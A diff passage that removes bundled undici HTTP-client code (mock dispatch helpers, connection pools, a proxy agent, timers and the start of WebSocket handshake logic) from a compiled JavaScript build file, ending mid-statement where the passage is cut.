-function buildHeadersFromArray (headers) { // fetch HeadersList - const clone = headers.slice() - const entries = [] - for (let index = 0; index < clone.length; index += 2) { - entries.push([clone[index], clone[index + 1]]) - } - return Object.fromEntries(entries) -} - -function matchHeaders (mockDispatch, headers) { - if (typeof mockDispatch.headers === 'function') { - if (Array.isArray(headers)) { // fetch HeadersList - headers = buildHeadersFromArray(headers) - } - return mockDispatch.headers(headers ? lowerCaseEntries(headers) : {}) - } - if (typeof mockDispatch.headers === 'undefined') { - return true - } - if (typeof headers !== 'object' || typeof mockDispatch.headers !== 'object') { - return false - } - - for (const [matchHeaderName, matchHeaderValue] of Object.entries(mockDispatch.headers)) { - const headerValue = getHeaderByName(headers, matchHeaderName) - - if (!matchValue(matchHeaderValue, headerValue)) { - return false - } - } - return true -} - -function safeUrl (path) { - if (typeof path !== 'string') { - return path - } - - const pathSegments = path.split('?') - - if (pathSegments.length !== 2) { - return path - } - - const qp = new URLSearchParams(pathSegments.pop()) - qp.sort() - return [...pathSegments, qp.toString()].join('?') -} - -function matchKey (mockDispatch, { path, method, body, headers }) { - const pathMatch = matchValue(mockDispatch.path, path) - const methodMatch = matchValue(mockDispatch.method, method) - const bodyMatch = typeof mockDispatch.body !== 'undefined' ? matchValue(mockDispatch.body, body) : true - const headersMatch = matchHeaders(mockDispatch, headers) - return pathMatch && methodMatch && bodyMatch && headersMatch -} - -function getResponseData (data) { - if (Buffer.isBuffer(data)) { - return data - } else if (typeof data === 'object') { - return JSON.stringify(data) - } else { - return data.toString() - } -} - -function getMockDispatch (mockDispatches, key) { - const basePath = key.query ? buildURL(key.path, key.query) : key.path - const resolvedPath = typeof basePath === 'string' ? safeUrl(basePath) : basePath - - // Match path - let matchedMockDispatches = mockDispatches.filter(({ consumed }) => !consumed).filter(({ path }) => matchValue(safeUrl(path), resolvedPath)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for path '${resolvedPath}'`) - } - - // Match method - matchedMockDispatches = matchedMockDispatches.filter(({ method }) => matchValue(method, key.method)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for method '${key.method}'`) - } - - // Match body - matchedMockDispatches = matchedMockDispatches.filter(({ body }) => typeof body !== 'undefined' ? matchValue(body, key.body) : true) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for body '${key.body}'`) - } - - // Match headers - matchedMockDispatches = matchedMockDispatches.filter((mockDispatch) => matchHeaders(mockDispatch, key.headers)) - if (matchedMockDispatches.length === 0) { - throw new MockNotMatchedError(`Mock dispatch not matched for headers '${typeof key.headers === 'object' ? JSON.stringify(key.headers) : key.headers}'`) - } - - return matchedMockDispatches[0] -} - -function addMockDispatch (mockDispatches, key, data) { - const baseData = { timesInvoked: 0, times: 1, persist: false, consumed: false } - const replyData = typeof data === 'function' ? { callback: data } : { ...data } - const newMockDispatch = { ...baseData, ...key, pending: true, data: { error: null, ...replyData } } - mockDispatches.push(newMockDispatch) - return newMockDispatch -} - -function deleteMockDispatch (mockDispatches, key) { - const index = mockDispatches.findIndex(dispatch => { - if (!dispatch.consumed) { - return false - } - return matchKey(dispatch, key) - }) - if (index !== -1) { - mockDispatches.splice(index, 1) - } -} - -function buildKey (opts) { - const { path, method, body, headers, query } = opts - return { - path, - method, - body, - headers, - query - } -} - -function generateKeyValues (data) { - return Object.entries(data).reduce((keyValuePairs, [key, value]) => [ - ...keyValuePairs, - Buffer.from(`${key}`), - Array.isArray(value) ? value.map(x => Buffer.from(`${x}`)) : Buffer.from(`${value}`) - ], []) -} - -/** - * @see https://developer.mozilla.org/en-US/docs/Web/HTTP/Status - * @param {number} statusCode - */ -function getStatusText (statusCode) { - return STATUS_CODES[statusCode] || 'unknown' -} - -async function getResponse (body) { - const buffers = [] - for await (const data of body) { - buffers.push(data) - } - return Buffer.concat(buffers).toString('utf8') -} - -/** - * Mock dispatch function used to simulate undici dispatches - */ -function mockDispatch (opts, handler) { - // Get mock dispatch from built key - const key = buildKey(opts) - const mockDispatch = getMockDispatch(this[kDispatches], key) - - mockDispatch.timesInvoked++ - - // Here's where we resolve a callback if a callback is present for the dispatch data. - if (mockDispatch.data.callback) { - mockDispatch.data = { ...mockDispatch.data, ...mockDispatch.data.callback(opts) } - } - - // Parse mockDispatch data - const { data: { statusCode, data, headers, trailers, error }, delay, persist } = mockDispatch - const { timesInvoked, times } = mockDispatch - - // If it's used up and not persistent, mark as consumed - mockDispatch.consumed = !persist && timesInvoked >= times - mockDispatch.pending = timesInvoked < times - - // If specified, trigger dispatch error - if (error !== null) { - deleteMockDispatch(this[kDispatches], key) - handler.onError(error) - return true - } - - // Handle the request with a delay if necessary - if (typeof delay === 'number' && delay > 0) { - setTimeout(() => { - handleReply(this[kDispatches]) - }, delay) - } else { - handleReply(this[kDispatches]) - } - - function handleReply (mockDispatches, _data = data) { - // fetch's HeadersList is a 1D string array - const optsHeaders = Array.isArray(opts.headers) - ? buildHeadersFromArray(opts.headers) - : opts.headers - const body = typeof _data === 'function' - ? _data({ ...opts, headers: optsHeaders }) - : _data - - // util.types.isPromise is likely needed for jest. - if (isPromise(body)) { - // If handleReply is asynchronous, throwing an error - // in the callback will reject the promise, rather than - // synchronously throw the error, which breaks some tests. - // Rather, we wait for the callback to resolve if it is a - // promise, and then re-run handleReply with the new body. - body.then((newData) => handleReply(mockDispatches, newData)) - return - } - - const responseData = getResponseData(body) - const responseHeaders = generateKeyValues(headers) - const responseTrailers = generateKeyValues(trailers) - - handler.abort = nop - handler.onHeaders(statusCode, responseHeaders, resume, getStatusText(statusCode)) - handler.onData(Buffer.from(responseData)) - handler.onComplete(responseTrailers) - deleteMockDispatch(mockDispatches, key) - } - - function resume () {} - - return true -} - -function buildMockDispatch () { - const agent = this[kMockAgent] - const origin = this[kOrigin] - const originalDispatch = this[kOriginalDispatch] - - return function dispatch (opts, handler) { - if (agent.isMockActive) { - try { - mockDispatch.call(this, opts, handler) - } catch (error) { - if (error instanceof MockNotMatchedError) { - const netConnect = agent[kGetNetConnect]() - if (netConnect === false) { - throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect disabled)`) - } - if (checkNetConnect(netConnect, origin)) { - originalDispatch.call(this, opts, handler) - } else { - throw new MockNotMatchedError(`${error.message}: subsequent request to origin ${origin} was not allowed (net.connect is not enabled for this origin)`) - } - } else { - throw error - } - } - } else { - originalDispatch.call(this, opts, handler) - } - } -} - -function checkNetConnect (netConnect, origin) { - const url = new URL(origin) - if (netConnect === true) { - return true - } else if (Array.isArray(netConnect) && netConnect.some((matcher) => matchValue(matcher, url.host))) { - return true - } - return false -} - -function buildMockOptions (opts) { - if (opts) { - const { agent, ...mockOptions } = opts - return mockOptions - } -} - -module.exports = { - getResponseData, - getMockDispatch, - addMockDispatch, - deleteMockDispatch, - buildKey, - generateKeyValues, - matchValue, - getResponse, - getStatusText, - mockDispatch, - buildMockDispatch, - checkNetConnect, - buildMockOptions, - getHeaderByName -} - - -/***/ }), - -/***/ 6823: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { Transform } = __nccwpck_require__(2781) -const { Console } = __nccwpck_require__(6206) - -/** - * Gets the output of `console.table(…)` as a string. - */ -module.exports = class PendingInterceptorsFormatter { - constructor ({ disableColors } = {}) { - this.transform = new Transform({ - transform (chunk, _enc, cb) { - cb(null, chunk) - } - }) - - this.logger = new Console({ - stdout: this.transform, - inspectOptions: { - colors: !disableColors && !process.env.CI - } - }) - } - - format (pendingInterceptors) { - const withPrettyHeaders = pendingInterceptors.map( - ({ method, path, data: { statusCode }, persist, times, timesInvoked, origin }) => ({ - Method: method, - Origin: origin, - Path: path, - 'Status code': statusCode, - Persistent: persist ? '✅' : 'âŒ', - Invocations: timesInvoked, - Remaining: persist ? Infinity : times - timesInvoked - })) - - this.logger.table(withPrettyHeaders) - return this.transform.read().toString() - } -} - - -/***/ }), - -/***/ 8891: -/***/ ((module) => { - -"use strict"; - - -const singulars = { - pronoun: 'it', - is: 'is', - was: 'was', - this: 'this' -} - -const plurals = { - pronoun: 'they', - is: 'are', - was: 'were', - this: 'these' -} - -module.exports = class Pluralizer { - constructor (singular, plural) { - this.singular = singular - this.plural = plural - } - - pluralize (count) { - const one = count === 1 - const keys = one ? singulars : plurals - const noun = one ? this.singular : this.plural - return { ...keys, count, noun } - } -} - - -/***/ }), - -/***/ 8266: -/***/ ((module) => { - -"use strict"; -/* eslint-disable */ - - - -// Extracted from node/lib/internal/fixed_queue.js - -// Currently optimal queue size, tested on V8 6.0 - 6.6. Must be power of two. -const kSize = 2048; -const kMask = kSize - 1; - -// The FixedQueue is implemented as a singly-linked list of fixed-size -// circular buffers. It looks something like this: -// -// head tail -// | | -// v v -// +-----------+ <-----\ +-----------+ <------\ +-----------+ -// | [null] | \----- | next | \------- | next | -// +-----------+ +-----------+ +-----------+ -// | item | <-- bottom | item | <-- bottom | [empty] | -// | item | | item | | [empty] | -// | item | | item | | [empty] | -// | item | | item | | [empty] | -// | item | | item | bottom --> | item | -// | item | | item | | item | -// | ... | | ... | | ... | -// | item | | item | | item | -// | item | | item | | item | -// | [empty] | <-- top | item | | item | -// | [empty] | | item | | item | -// | [empty] | | [empty] | <-- top top --> | [empty] | -// +-----------+ +-----------+ +-----------+ -// -// Or, if there is only one circular buffer, it looks something -// like either of these: -// -// head tail head tail -// | | | | -// v v v v -// +-----------+ +-----------+ -// | [null] | | [null] | -// +-----------+ +-----------+ -// | [empty] | | item | -// | [empty] | | item | -// | item | <-- bottom top --> | [empty] | -// | item | | [empty] | -// | [empty] | <-- top bottom --> | item | -// | [empty] | | item | -// +-----------+ +-----------+ -// -// Adding a value means moving `top` forward by one, removing means -// moving `bottom` forward by one. After reaching the end, the queue -// wraps around. -// -// When `top === bottom` the current queue is empty and when -// `top + 1 === bottom` it's full. This wastes a single space of storage -// but allows much quicker checks. - -class FixedCircularBuffer { - constructor() { - this.bottom = 0; - this.top = 0; - this.list = new Array(kSize); - this.next = null; - } - - isEmpty() { - return this.top === this.bottom; - } - - isFull() { - return ((this.top + 1) & kMask) === this.bottom; - } - - push(data) { - this.list[this.top] = data; - this.top = (this.top + 1) & kMask; - } - - shift() { - const nextItem = this.list[this.bottom]; - if (nextItem === undefined) - return null; - this.list[this.bottom] = undefined; - this.bottom = (this.bottom + 1) & kMask; - return nextItem; - } -} - -module.exports = class FixedQueue { - constructor() { - this.head = this.tail = new FixedCircularBuffer(); - } - - isEmpty() { - return this.head.isEmpty(); - } - - push(data) { - if (this.head.isFull()) { - // Head is full: Creates a new queue, sets the old queue's `.next` to it, - // and sets it as the new main queue. - this.head = this.head.next = new FixedCircularBuffer(); - } - this.head.push(data); - } - - shift() { - const tail = this.tail; - const next = tail.shift(); - if (tail.isEmpty() && tail.next !== null) { - // If there is another queue, it forms the new tail. - this.tail = tail.next; - } - return next; - } -}; - - -/***/ }), - -/***/ 3198: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const DispatcherBase = __nccwpck_require__(4839) -const FixedQueue = __nccwpck_require__(8266) -const { kConnected, kSize, kRunning, kPending, kQueued, kBusy, kFree, kUrl, kClose, kDestroy, kDispatch } = __nccwpck_require__(2785) -const PoolStats = __nccwpck_require__(9689) - -const kClients = Symbol('clients') -const kNeedDrain = Symbol('needDrain') -const kQueue = Symbol('queue') -const kClosedResolve = Symbol('closed resolve') -const kOnDrain = Symbol('onDrain') -const kOnConnect = Symbol('onConnect') -const kOnDisconnect = Symbol('onDisconnect') -const kOnConnectionError = Symbol('onConnectionError') -const kGetDispatcher = Symbol('get dispatcher') -const kAddClient = Symbol('add client') -const kRemoveClient = Symbol('remove client') -const kStats = Symbol('stats') - -class PoolBase extends DispatcherBase { - constructor () { - super() - - this[kQueue] = new FixedQueue() - this[kClients] = [] - this[kQueued] = 0 - - const pool = this - - this[kOnDrain] = function onDrain (origin, targets) { - const queue = pool[kQueue] - - let needDrain = false - - while (!needDrain) { - const item = queue.shift() - if (!item) { - break - } - pool[kQueued]-- - needDrain = !this.dispatch(item.opts, item.handler) - } - - this[kNeedDrain] = needDrain - - if (!this[kNeedDrain] && pool[kNeedDrain]) { - pool[kNeedDrain] = false - pool.emit('drain', origin, [pool, ...targets]) - } - - if (pool[kClosedResolve] && queue.isEmpty()) { - Promise - .all(pool[kClients].map(c => c.close())) - .then(pool[kClosedResolve]) - } - } - - this[kOnConnect] = (origin, targets) => { - pool.emit('connect', origin, [pool, ...targets]) - } - - this[kOnDisconnect] = (origin, targets, err) => { - pool.emit('disconnect', origin, [pool, ...targets], err) - } - - this[kOnConnectionError] = (origin, targets, err) => { - pool.emit('connectionError', origin, [pool, ...targets], err) - } - - this[kStats] = new PoolStats(this) - } - - get [kBusy] () { - return this[kNeedDrain] - } - - get [kConnected] () { - return this[kClients].filter(client => client[kConnected]).length - } - - get [kFree] () { - return this[kClients].filter(client => client[kConnected] && !client[kNeedDrain]).length - } - - get [kPending] () { - let ret = this[kQueued] - for (const { [kPending]: pending } of this[kClients]) { - ret += pending - } - return ret - } - - get [kRunning] () { - let ret = 0 - for (const { [kRunning]: running } of this[kClients]) { - ret += running - } - return ret - } - - get [kSize] () { - let ret = this[kQueued] - for (const { [kSize]: size } of this[kClients]) { - ret += size - } - return ret - } - - get stats () { - return this[kStats] - } - - async [kClose] () { - if (this[kQueue].isEmpty()) { - return Promise.all(this[kClients].map(c => c.close())) - } else { - return new Promise((resolve) => { - this[kClosedResolve] = resolve - }) - } - } - - async [kDestroy] (err) { - while (true) { - const item = this[kQueue].shift() - if (!item) { - break - } - item.handler.onError(err) - } - - return Promise.all(this[kClients].map(c => c.destroy(err))) - } - - [kDispatch] (opts, handler) { - const dispatcher = this[kGetDispatcher]() - - if (!dispatcher) { - this[kNeedDrain] = true - this[kQueue].push({ opts, handler }) - this[kQueued]++ - } else if (!dispatcher.dispatch(opts, handler)) { - dispatcher[kNeedDrain] = true - this[kNeedDrain] = !this[kGetDispatcher]() - } - - return !this[kNeedDrain] - } - - [kAddClient] (client) { - client - .on('drain', this[kOnDrain]) - .on('connect', this[kOnConnect]) - .on('disconnect', this[kOnDisconnect]) - .on('connectionError', this[kOnConnectionError]) - - this[kClients].push(client) - - if (this[kNeedDrain]) { - process.nextTick(() => { - if (this[kNeedDrain]) { - this[kOnDrain](client[kUrl], [this, client]) - } - }) - } - - return this - } - - [kRemoveClient] (client) { - client.close(() => { - const idx = this[kClients].indexOf(client) - if (idx !== -1) { - this[kClients].splice(idx, 1) - } - }) - - this[kNeedDrain] = this[kClients].some(dispatcher => ( - !dispatcher[kNeedDrain] && - dispatcher.closed !== true && - dispatcher.destroyed !== true - )) - } -} - -module.exports = { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kRemoveClient, - kGetDispatcher -} - - -/***/ }), - -/***/ 9689: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -const { kFree, kConnected, kPending, kQueued, kRunning, kSize } = __nccwpck_require__(2785) -const kPool = Symbol('pool') - -class PoolStats { - constructor (pool) { - this[kPool] = pool - } - - get connected () { - return this[kPool][kConnected] - } - - get free () { - return this[kPool][kFree] - } - - get pending () { - return this[kPool][kPending] - } - - get queued () { - return this[kPool][kQueued] - } - - get running () { - return this[kPool][kRunning] - } - - get size () { - return this[kPool][kSize] - } -} - -module.exports = PoolStats - - -/***/ }), - -/***/ 4634: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { - PoolBase, - kClients, - kNeedDrain, - kAddClient, - kGetDispatcher -} = __nccwpck_require__(3198) -const Client = __nccwpck_require__(3598) -const { - InvalidArgumentError -} = __nccwpck_require__(8045) -const util = __nccwpck_require__(3983) -const { kUrl, kInterceptors } = __nccwpck_require__(2785) -const buildConnector = __nccwpck_require__(2067) - -const kOptions = Symbol('options') -const kConnections = Symbol('connections') -const kFactory = Symbol('factory') - -function defaultFactory (origin, opts) { - return new Client(origin, opts) -} - -class Pool extends PoolBase { - constructor (origin, { - connections, - factory = defaultFactory, - connect, - connectTimeout, - tls, - maxCachedSessions, - socketPath, - autoSelectFamily, - autoSelectFamilyAttemptTimeout, - allowH2, - ...options - } = {}) { - super() - - if (connections != null && (!Number.isFinite(connections) || connections < 0)) { - throw new InvalidArgumentError('invalid connections') - } - - if (typeof factory !== 'function') { - throw new InvalidArgumentError('factory must be a function.') - } - - if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { - throw new InvalidArgumentError('connect must be a function or an object') - } - - if (typeof connect !== 'function') { - connect = buildConnector({ - ...tls, - maxCachedSessions, - allowH2, - socketPath, - timeout: connectTimeout, - ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), - ...connect - }) - } - - this[kInterceptors] = options.interceptors && options.interceptors.Pool && Array.isArray(options.interceptors.Pool) - ? options.interceptors.Pool - : [] - this[kConnections] = connections || null - this[kUrl] = util.parseOrigin(origin) - this[kOptions] = { ...util.deepClone(options), connect, allowH2 } - this[kOptions].interceptors = options.interceptors - ? { ...options.interceptors } - : undefined - this[kFactory] = factory - } - - [kGetDispatcher] () { - let dispatcher = this[kClients].find(dispatcher => !dispatcher[kNeedDrain]) - - if (dispatcher) { - return dispatcher - } - - if (!this[kConnections] || this[kClients].length < this[kConnections]) { - dispatcher = this[kFactory](this[kUrl], this[kOptions]) - this[kAddClient](dispatcher) - } - - return dispatcher - } -} - -module.exports = Pool - - -/***/ }), - -/***/ 7858: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kProxy, kClose, kDestroy, kInterceptors } = __nccwpck_require__(2785) -const { URL } = __nccwpck_require__(7310) -const Agent = __nccwpck_require__(7890) -const Pool = __nccwpck_require__(4634) -const DispatcherBase = __nccwpck_require__(4839) -const { InvalidArgumentError, RequestAbortedError } = __nccwpck_require__(8045) -const buildConnector = __nccwpck_require__(2067) - -const kAgent = Symbol('proxy agent') -const kClient = Symbol('proxy client') -const kProxyHeaders = Symbol('proxy headers') -const kRequestTls = Symbol('request tls settings') -const kProxyTls = Symbol('proxy tls settings') -const kConnectEndpoint = Symbol('connect endpoint function') - -function defaultProtocolPort (protocol) { - return protocol === 'https:' ? 443 : 80 -} - -function buildProxyOptions (opts) { - if (typeof opts === 'string') { - opts = { uri: opts } - } - - if (!opts || !opts.uri) { - throw new InvalidArgumentError('Proxy opts.uri is mandatory') - } - - return { - uri: opts.uri, - protocol: opts.protocol || 'https' - } -} - -function defaultFactory (origin, opts) { - return new Pool(origin, opts) -} - -class ProxyAgent extends DispatcherBase { - constructor (opts) { - super(opts) - this[kProxy] = buildProxyOptions(opts) - this[kAgent] = new Agent(opts) - this[kInterceptors] = opts.interceptors && opts.interceptors.ProxyAgent && Array.isArray(opts.interceptors.ProxyAgent) - ? opts.interceptors.ProxyAgent - : [] - - if (typeof opts === 'string') { - opts = { uri: opts } - } - - if (!opts || !opts.uri) { - throw new InvalidArgumentError('Proxy opts.uri is mandatory') - } - - const { clientFactory = defaultFactory } = opts - - if (typeof clientFactory !== 'function') { - throw new InvalidArgumentError('Proxy opts.clientFactory must be a function.') - } - - this[kRequestTls] = opts.requestTls - this[kProxyTls] = opts.proxyTls - this[kProxyHeaders] = opts.headers || {} - - const resolvedUrl = new URL(opts.uri) - const { origin, port, host, username, password } = resolvedUrl - - if (opts.auth && opts.token) { - throw new InvalidArgumentError('opts.auth cannot be used in combination with opts.token') - } else if (opts.auth) { - /* @deprecated in favour of opts.token */ - this[kProxyHeaders]['proxy-authorization'] = `Basic ${opts.auth}` - } else if (opts.token) { - this[kProxyHeaders]['proxy-authorization'] = opts.token - } else if (username && password) { - this[kProxyHeaders]['proxy-authorization'] = `Basic ${Buffer.from(`${decodeURIComponent(username)}:${decodeURIComponent(password)}`).toString('base64')}` - } - - const connect = buildConnector({ ...opts.proxyTls }) - this[kConnectEndpoint] = buildConnector({ ...opts.requestTls }) - this[kClient] = clientFactory(resolvedUrl, { connect }) - this[kAgent] = new Agent({ - ...opts, - connect: async (opts, callback) => { - let requestedHost = opts.host - if (!opts.port) { - requestedHost += `:${defaultProtocolPort(opts.protocol)}` - } - try { - const { socket, statusCode } = await this[kClient].connect({ - origin, - port, - path: requestedHost, - signal: opts.signal, - headers: { - ...this[kProxyHeaders], - host - } - }) - if (statusCode !== 200) { - socket.on('error', () => {}).destroy() - callback(new RequestAbortedError(`Proxy response (${statusCode}) !== 200 when HTTP Tunneling`)) - } - if (opts.protocol !== 'https:') { - callback(null, socket) - return - } - let servername - if (this[kRequestTls]) { - servername = this[kRequestTls].servername - } else { - servername = opts.servername - } - this[kConnectEndpoint]({ ...opts, servername, httpSocket: socket }, callback) - } catch (err) { - callback(err) - } - } - }) - } - - dispatch (opts, handler) { - const { host } = new URL(opts.origin) - const headers = buildHeaders(opts.headers) - throwIfProxyAuthIsSent(headers) - return this[kAgent].dispatch( - { - ...opts, - headers: { - ...headers, - host - } - }, - handler - ) - } - - async [kClose] () { - await this[kAgent].close() - await this[kClient].close() - } - - async [kDestroy] () { - await this[kAgent].destroy() - await this[kClient].destroy() - } -} - -/** - * @param {string[] | Record} headers - * @returns {Record} - */ -function buildHeaders (headers) { - // When using undici.fetch, the headers list is stored - // as an array. - if (Array.isArray(headers)) { - /** @type {Record} */ - const headersPair = {} - - for (let i = 0; i < headers.length; i += 2) { - headersPair[headers[i]] = headers[i + 1] - } - - return headersPair - } - - return headers -} - -/** - * @param {Record} headers - * - * Previous versions of ProxyAgent suggests the Proxy-Authorization in request headers - * Nevertheless, it was changed and to avoid a security vulnerability by end users - * this check was created. - * It should be removed in the next major version for performance reasons - */ -function throwIfProxyAuthIsSent (headers) { - const existProxyAuth = headers && Object.keys(headers) - .find((key) => key.toLowerCase() === 'proxy-authorization') - if (existProxyAuth) { - throw new InvalidArgumentError('Proxy-Authorization should be sent in ProxyAgent constructor') - } -} - -module.exports = ProxyAgent - - -/***/ }), - -/***/ 9459: -/***/ ((module) => { - -"use strict"; - - -let fastNow = Date.now() -let fastNowTimeout - -const fastTimers = [] - -function onTimeout () { - fastNow = Date.now() - - let len = fastTimers.length - let idx = 0 - while (idx < len) { - const timer = fastTimers[idx] - - if (timer.state === 0) { - timer.state = fastNow + timer.delay - } else if (timer.state > 0 && fastNow >= timer.state) { - timer.state = -1 - timer.callback(timer.opaque) - } - - if (timer.state === -1) { - timer.state = -2 - if (idx !== len - 1) { - fastTimers[idx] = fastTimers.pop() - } else { - fastTimers.pop() - } - len -= 1 - } else { - idx += 1 - } - } - - if (fastTimers.length > 0) { - refreshTimeout() - } -} - -function refreshTimeout () { - if (fastNowTimeout && fastNowTimeout.refresh) { - fastNowTimeout.refresh() - } else { - clearTimeout(fastNowTimeout) - fastNowTimeout = setTimeout(onTimeout, 1e3) - if (fastNowTimeout.unref) { - fastNowTimeout.unref() - } - } -} - -class Timeout { - constructor (callback, delay, opaque) { - this.callback = callback - this.delay = delay - this.opaque = opaque - - // -2 not in timer list - // -1 in timer list but inactive - // 0 in timer list waiting for time - // > 0 in timer list waiting for time to expire - this.state = -2 - - this.refresh() - } - - refresh () { - if (this.state === -2) { - fastTimers.push(this) - if (!fastNowTimeout || fastTimers.length === 1) { - refreshTimeout() - } - } - - this.state = 0 - } - - clear () { - this.state = -1 - } -} - -module.exports = { - setTimeout (callback, delay, opaque) { - return delay < 1e3 - ? setTimeout(callback, delay, opaque) - : new Timeout(callback, delay, opaque) - }, - clearTimeout (timeout) { - if (timeout instanceof Timeout) { - timeout.clear() - } else { - clearTimeout(timeout) - } - } -} - - -/***/ }), - -/***/ 5354: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const diagnosticsChannel = __nccwpck_require__(7643) -const { uid, states } = __nccwpck_require__(9188) -const { - kReadyState, - kSentClose, - kByteParser, - kReceivedClose -} = __nccwpck_require__(7578) -const { fireEvent, failWebsocketConnection } = __nccwpck_require__(5515) -const { CloseEvent } = __nccwpck_require__(2611) -const { makeRequest } = __nccwpck_require__(8359) -const { fetching } = __nccwpck_require__(4881) -const { Headers } = __nccwpck_require__(554) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { kHeadersList } = __nccwpck_require__(2785) - -const channels = {} -channels.open = diagnosticsChannel.channel('undici:websocket:open') -channels.close = diagnosticsChannel.channel('undici:websocket:close') -channels.socketError = diagnosticsChannel.channel('undici:websocket:socket_error') - -/** @type {import('crypto')} */ -let crypto -try { - crypto = __nccwpck_require__(6113) -} catch { - -} - -/** - * @see https://websockets.spec.whatwg.org/#concept-websocket-establish - * @param {URL} url - * @param {string|string[]} protocols - * @param {import('./websocket').WebSocket} ws - * @param {(response: any) => void} onEstablish - * @param {Partial} options - */ -function establishWebSocketConnection (url, protocols, ws, onEstablish, options) { - // 1. Let requestURL be a copy of url, with its scheme set to "http", if url’s - // scheme is "ws", and to "https" otherwise. - const requestURL = url - - requestURL.protocol = url.protocol === 'ws:' ? 'http:' : 'https:' - - // 2. Let request be a new request, whose URL is requestURL, client is client, - // service-workers mode is "none", referrer is "no-referrer", mode is - // "websocket", credentials mode is "include", cache mode is "no-store" , - // and redirect mode is "error". - const request = makeRequest({ - urlList: [requestURL], - serviceWorkers: 'none', - referrer: 'no-referrer', - mode: 'websocket', - credentials: 'include', - cache: 'no-store', - redirect: 'error' - }) - - // Note: undici extension, allow setting custom headers. - if (options.headers) { - const headersList = new Headers(options.headers)[kHeadersList] - - request.headersList = headersList - } - - // 3. Append (`Upgrade`, `websocket`) to request’s header list. - // 4. Append (`Connection`, `Upgrade`) to request’s header list. - // Note: both of these are handled by undici currently. - // https://github.com/nodejs/undici/blob/68c269c4144c446f3f1220951338daef4a6b5ec4/lib/client.js#L1397 - - // 5. Let keyValue be a nonce consisting of a randomly selected - // 16-byte value that has been forgiving-base64-encoded and - // isomorphic encoded. - const keyValue = crypto.randomBytes(16).toString('base64') - - // 6. Append (`Sec-WebSocket-Key`, keyValue) to request’s - // header list. - request.headersList.append('sec-websocket-key', keyValue) - - // 7. Append (`Sec-WebSocket-Version`, `13`) to request’s - // header list. - request.headersList.append('sec-websocket-version', '13') - - // 8. For each protocol in protocols, combine - // (`Sec-WebSocket-Protocol`, protocol) in request’s header - // list. - for (const protocol of protocols) { - request.headersList.append('sec-websocket-protocol', protocol) - } - - // 9. Let permessageDeflate be a user-agent defined - // "permessage-deflate" extension header value. - // https://github.com/mozilla/gecko-dev/blob/ce78234f5e653a5d3916813ff990f053510227bc/netwerk/protocol/websocket/WebSocketChannel.cpp#L2673 - // TODO: enable once permessage-deflate is supported - const permessageDeflate = '' // 'permessage-deflate; 15' - - // 10. Append (`Sec-WebSocket-Extensions`, permessageDeflate) to - // request’s header list. - // request.headersList.append('sec-websocket-extensions', permessageDeflate) - - // 11. Fetch request with useParallelQueue set to true, and - // processResponse given response being these steps: - const controller = fetching({ - request, - useParallelQueue: true, - dispatcher: options.dispatcher ?? getGlobalDispatcher(), - processResponse (response) { - // 1. If response is a network error or its status is not 101, - // fail the WebSocket connection. - if (response.type === 'error' || response.status !== 101) { - failWebsocketConnection(ws, 'Received network error or non-101 status code.') - return - } - - // 2. If protocols is not the empty list and extracting header - // list values given `Sec-WebSocket-Protocol` and response’s - // header list results in null, failure, or the empty byte - // sequence, then fail the WebSocket connection. - if (protocols.length !== 0 && !response.headersList.get('Sec-WebSocket-Protocol')) { - failWebsocketConnection(ws, 'Server did not respond with sent protocols.') - return - } - - // 3. Follow the requirements stated step 2 to step 6, inclusive, - // of the last set of steps in section 4.1 of The WebSocket - // Protocol to validate response. This either results in fail - // the WebSocket connection or the WebSocket connection is - // established. - - // 2. If the response lacks an |Upgrade| header field or the |Upgrade| - // header field contains a value that is not an ASCII case- - // insensitive match for the value "websocket", the client MUST - // _Fail the WebSocket Connection_. - if (response.headersList.get('Upgrade')?.toLowerCase() !== 'websocket') { - failWebsocketConnection(ws, 'Server did not set Upgrade header to "websocket".') - return - } - - // 3. If the response lacks a |Connection| header field or the - // |Connection| header field doesn't contain a token that is an - // ASCII case-insensitive match for the value "Upgrade", the client - // MUST _Fail the WebSocket Connection_. - if (response.headersList.get('Connection')?.toLowerCase() !== 'upgrade') { - failWebsocketConnection(ws, 'Server did not set Connection header to "upgrade".') - return - } - - // 4. If the response lacks a |Sec-WebSocket-Accept| header field or - // the |Sec-WebSocket-Accept| contains a value other than the - // base64-encoded SHA-1 of the concatenation of the |Sec-WebSocket- - // Key| (as a string, not base64-decoded) with the string "258EAFA5- - // E914-47DA-95CA-C5AB0DC85B11" but ignoring any leading and - // trailing whitespace, the client MUST _Fail the WebSocket - // Connection_. - const secWSAccept = response.headersList.get('Sec-WebSocket-Accept') - const digest = crypto.createHash('sha1').update(keyValue + uid).digest('base64') - if (secWSAccept !== digest) { - failWebsocketConnection(ws, 'Incorrect hash received in Sec-WebSocket-Accept header.') - return - } - - // 5. If the response includes a |Sec-WebSocket-Extensions| header - // field and this header field indicates the use of an extension - // that was not present in the client's handshake (the server has - // indicated an extension not requested by the client), the client - // MUST _Fail the WebSocket Connection_. (The parsing of this - // header field to determine which extensions are requested is - // discussed in Section 9.1.) - const secExtension = response.headersList.get('Sec-WebSocket-Extensions') - - if (secExtension !== null && secExtension !== permessageDeflate) { - failWebsocketConnection(ws, 'Received different permessage-deflate than the one set.') - return - } - - // 6. If the response includes a |Sec-WebSocket-Protocol| header field - // and this header field indicates the use of a subprotocol that was - // not present in the client's handshake (the server has indicated a - // subprotocol not requested by the client), the client MUST _Fail - // the WebSocket Connection_. - const secProtocol = response.headersList.get('Sec-WebSocket-Protocol') - - if (secProtocol !== null && secProtocol !== 